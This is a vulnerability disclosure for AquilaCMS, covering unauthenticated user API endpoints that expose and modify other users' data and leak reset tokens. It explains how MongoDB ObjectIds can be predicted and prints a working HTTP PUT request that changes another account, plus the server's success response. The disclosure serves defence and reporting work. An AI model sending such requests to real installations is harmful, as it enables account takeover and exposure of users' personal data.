AquilaCMS Vulnerability

Description

Unauthenticated API calls allow anyone to view or change another user's first name, last name, password and address information. The same calls also expose each user's activateAccountToken and resetPassToken, the values used during account activation and the password reset function. Total account compromise is possible through these API calls.

Proof of Concept

The attacker needs the target's MongoDB ObjectId (the `_id` field). ObjectIds are not securely random: the 12 bytes are a 4-byte timestamp, a 5-byte value fixed per server process and a 3-byte counter, so the ObjectId handed back for the attacker's own registration already reveals most of the bytes of every other user's id created by the same process. Starting from one valid ObjectId, the linked GitHub repo (see References) generates candidate ObjectIds for other users. With a candidate `_id`, the unauthenticated API calls can be used to view, modify and compromise the associated account. Example of updating another user's information:

Variables: {IP}, {ID}

PUT /api/v2/user HTTP/1.1
Host: {IP}:3010
Content-Length: 245
Accept: application/json, text/plain, */*
lang: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://{IP}:3010
Referer: http://{IP}:3010/account
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

{"delivery_address":1,"billing_address":0,"isActiveAccount":false,"_id":"{ID}","civility":1,"lastname":"whatever20","firstname":"whatever","email":"admin2@admin2.aaa","preferredLanguage":"en","fullname":"whatever whatever10"}

Response:

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
Set-Cookie: cookie_notice=false; Path=/; Expires=Mon, 01 Nov 2021 22:16:10 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 1037
Date: Sun, 01 Aug 2021 22:16:11 GMT
Connection: close

{"code":"USER_UPDATE_SUCCESS",
[ ... ]

Location

users.js#L86

References

Mongo Objectid Predict

Disclosure

August 1st, 2021 - Initial Contact
August 10th, 2021 - Maintainer Confirmed Vulnerability
October 19th, 2021 - Follow-up Remediation - No Response